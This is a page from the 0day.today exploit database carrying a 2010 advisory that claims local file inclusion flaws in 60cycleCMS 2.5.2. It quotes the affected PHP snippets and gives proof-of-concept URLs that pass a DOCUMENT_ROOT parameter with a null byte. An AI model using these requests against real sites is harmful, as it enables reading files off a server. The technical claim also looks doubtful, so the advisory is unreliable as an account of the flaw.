[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

Author
eidelweiss
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11766
Category
web applications
Date add
13-04-2010
Platform
php
======================================================================
60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability 
======================================================================

[+]Title	:60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability
[+]Version:	2.5.2
[+]Download:	http://php.opensourcecms.com/scripts/details.php?scriptid=337
[+]License:	New BSD (http://www.opensource.org/licenses/bsd-license.php)
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com	

	[!]Thank`s To: All Friends

########################################################

[!] Descriptsion

60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written to power 60cycle.net. 
For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template. 


[!]-=[ Vuln C0de ]=-[!]

[-]  60cycleCMS_path/news.php

	<?php

	require 'common/lib.php';
	$root = $_SERVER['DOCUMENT_ROOT'];
	require_once("$root/../config.php");



[-] 60cycleCMS_path/submitComment.php

	<?php
	session_start();
	require_once('lib/recaptchalib.php');
	require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');
	$root = $_SERVER['DOCUMENT_ROOT'];
	require_once("$root/../config.php");


[-] 60cycleCMS_path/common/sqlConnect.php

	<?php

	// include your sql info file here
	$root = $_SERVER['DOCUMENT_ROOT'];
	require "$root/../config.php";


	[!] -=[ Proof Of Concept ]=-[!]

	http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
	http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00
	http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00

########################################################



#  0day.today [2024-11-16]  #